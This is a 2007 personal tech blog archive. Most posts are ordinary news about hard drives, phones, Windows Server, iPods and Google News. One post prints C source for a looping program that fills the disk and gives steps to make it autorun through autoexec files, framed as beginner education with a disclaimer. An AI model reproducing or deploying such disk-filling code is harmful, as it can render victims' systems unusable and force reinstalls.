Bharat Banate's Work Profile

View Bharat Banate's profile on LinkedIn
Showing posts with label Latest Happings. Show all posts
Showing posts with label Latest Happings. Show all posts

Sunday, November 4, 2007

Storage :1TB Hard Disk Drive


Recently Both Major companies Hitachi and Seagate have launched the disk drives of 1TB(1024 GB) which is major milestone in storage world.
In INDIAN markets currently Hitechi launched the drives of 1 tb.
“Growing volumes of songs, movies, personal videos, pictures and games stored on our PCs highlights a ready market for higher capacity HDDs in India,”.

“At 133 gigabits per square inch, the Hitachi 1TB hard drive crams much more data per square inch than any other HDD available in the market today. Quieter acoustics, lower heat dissipation levels and much faster read/write speeds, makes this family of Hitachi HDDs a must have for all PC users,” he added further.




The 3.5inch drive belongs to the 7200 RPM family of Hitachi 1TB SATA hard disk drives. These storage units can be used for business, commercial, gaming, media centre PCs and also in external storage devices. The new drive is equipped with reliable perpendicular magnetic recoding technology, robust 3GB SATA interface and enhanced Rotational Vibration Safeguard (RVS) technology.

Besides, the 1TB drive ensures the fast data transfer rates, low power consumption and advanced shock protection. Hitachi 1TB SATA hard disk comes along with a 5-year warranty.

System, designed to sustain performance in densely packed multi-drive systems.

Seagate Barracuda 7200.11 hard drive consumes 13W of power in comparison to Hitachi’s 1-TB hard drive which draws about 13.6W. In addition, the Seagate new 1TB hard drive has just 4 platters which results in cool operating temperatures and low-power consumption helping longer hard disk life with less chances for wear and tear.


Seagate claims that the Barracuda 7200.11 1TB hard drive unit is a newly designed product optimised for demanding business-critical and nearline enterprise storage environments including: networked and tiered storage solutions, reference/compliance storage, disc-to-disc backup and restore, archiving solutions, rich media content storage and collaboration.

Company also claims that the new Barracuda 7200.11 hard drive also boosts reliability with an unrecoverable error rate that is 10 times better than desktop class drives and a 1.2 million hour Mean Time Between Failure at full 24 x 7 data


Read More:
Seagate 1 TB HDD
and Hitechi 1 TB HDD

Also Its Interesting: hitachi

Sunday, October 7, 2007

Cellphone:Nokia's aeon "full surface screen" cellphone concept




Nokia's Aeon: A concept phone that combines two touch-sensitive panels mounted on a fuel-cell power pack.keypad. Each of the panels are capable of being used independently. The touch screen displays all buttons that are virtual, so in one situation one panel could operate as the display, the other as the Nokia also establishes a new wireless standard with wibree, basically an upgraded bluetooth which would allow the Aeon to be a thin-client, farming out processing and storage.

The Aeon seems to be typical razer-thin candy bar form factor cell phone with no actual buttons. That can change into any kind of menu, button and keypad with a simple touch. The touch screen method brings up a ton of quirky problems like causing damage to the display with those pointy thumbs of yours.

The concept phone, dubbed Aeon, combines two touch-sensitive panels mounted on a fuel-cell power pack. The handset's connectivity and electronics are built into the panels to allow them to be used independently. When assembled, one panel would operate as the display, the other as the keypad. Since the buttons are entirely virtual, Aeon can flip instantly between a numeric pad for dialling, a text-entry pad for messaging and a media-player controller.

Nokia's vision of wearable technology users could wear the lightweight panels as a badge, or connected to a wrist strap. The most prominent design feature of aeon is a touchscreen that stretches over the full surface area of the phone, similar to benq siemens's black box concept phone .

read on nokia : click here to read more

full story:click here

Thursday, September 13, 2007

Windows Server 2008 Beta 3:Just Released

After many months of waiting, Microsoft finally released the Beta 3 version of Windows Server 2008 (previously codenamed Longhorn), a major milestone pre-release version of the next version of Windows Server. (More recently, a CTP, or Community Technical Preview, version was distributed to beta testers in June 2007.) Windows Server 2008 has evolved quite a bit over time, and though the project hasn't suffered from the many feature drops and problems that dogged Windows Vista, there are certainly a somthing new in this version .


Download: Windows Server 2008 Beta 3 Enterprise Standard
Read more: Click here
and Here

Read Review:Review for MS server 2008

Monday, September 3, 2007

VIRUS:Making A simple virus in C for Beginners

Hi all,
at begining of the learning of computer programming it is a dream of almost all student to build a computer virus of his/her own.
Computer virus obviously is a thing that shouldnot be made and used on others computer it is completely illegal in all countries.So make and try this on your own machine.
Now explain what do the viruses do.There are several types of computer viruses with different functions(destructive obviously).Some of which delete computers' important files and folders,some change the configuration of your computer system like registry values,some occupy a large amount of memory space and dump your hard disc.There are some viruses too which can damage your RAM parmanently.
I am going to give here a simple virus program which has only a few lines bur has ability to jam your Hard disc.
The logic behind the program is nothing but making a self growing file which grows to a few MB in one tern and this growth will continue infinitely.
The require ment to make this virus is
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}

As you can see this is a very little programe.Compiling the programme we get v.exe file.This is our virus.
How it works?-The system call "dir>>╚a.exe" will execute the dos command 'dir' and ridirect its output toa file ╚a.exe(the symbol ╚ can be obtained by pressing 456 on numpad holding alt key).So running the program in a folder having many files and folder will increase the size of ╚a.exe in a great amount.This process will continue to infinity as this is in a while(1) loop;
Best try this on win98.then you cannot delete ╚a.exe from GUI.
For auto running place v.exe in the command folder in windows folder.
In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe.
Each time your window starts v.exe will run automatically.
Try this on your own computer remember the ╚a.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and ╚a.exe file from your computer.


Code:

//START v.c
#include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}

Caution:
It should not use on others computer..........This is harmful. So Before using this u need to backup ur all information which are saved in ur system drive. After run this program it will JAM ur system drive. so it may needs reinstall ur operating system. This information is given only for Awarness/Education purpose PLEASE DO NOT USE THIS THING TO HARM ANYONE


Further Reading: No further reading advised

Friday, August 31, 2007

GUI: Next Gen GUI Prototype(Must see)

hi there,
here is youtube link for bumptop GUI , i foundwhile just checking GUI's its nice concept and different from our conventional GUI.
well i try to upload video here , but due too technical problems i cant do that thing. and size is also litle big its 25mb.

you can see video here

See this one also


i would like to hear comments on this stuff! hope u all njoy it!

Monday, August 27, 2007

Rumours : New Apple iPods coming in September


Various news sites are reporting that Apple plans to launch new iPod models in September. There have been cease-and-desist orders handed out by Apple regarding photos as well as videos, although it is not clear whether Apple is covering up a trail or starting a fake one to create some excitement. Here's a few highlights that are being whispered:
  • A second generation iPhone (iPhone nano), a wide-screen iPod video (possibly with a touch-screen), an iPod nano with video support and an iPod shuffle with more storage are all likely announcements
  • The new devices will run different variants of Mac OS X, much like the iPhone
  • NAND flash memory will be used for storage for most, if not all, of the new products
  • A shorter but wider and thicker 4GB, 8GB and 16GB iPod Nano will be available in solid black, silver, cranberry, light blue, and light green
  • The new iPods will look much like the iPhone, except with a black, not silver, outside rim and may perform like it too: integration with iLife '08 (ability to browse 'Events' via a CoverFlow interface), similar way of displaying album art and a world clock widget
  • Despite touch-screen suggestions, it is unlikely the click-wheel interface will not be included in at least one of the new models


View
Supposed Leaked Images of 3G iPod Nano

source story:InformationWeek
|
Apple Insider
|Apple 2.0

Thursday, August 23, 2007

Google News: Launches YouTube Clips


Google has started to provide video clips in Google News, a feature it had been widely expected to add to its article search and aggregation site and which Yahoo and AOL already offer in their news sites.

Google News is adding the feature through a collaboration with the company's YouTube video-sharing site. The clips will come from channels that video news producers have set up on YouTube. Plus, with the YouTube video-playback technology, Google News users will not have to download any clips and they'll be able to view the videos in any browser, according to Google.

find the complet story here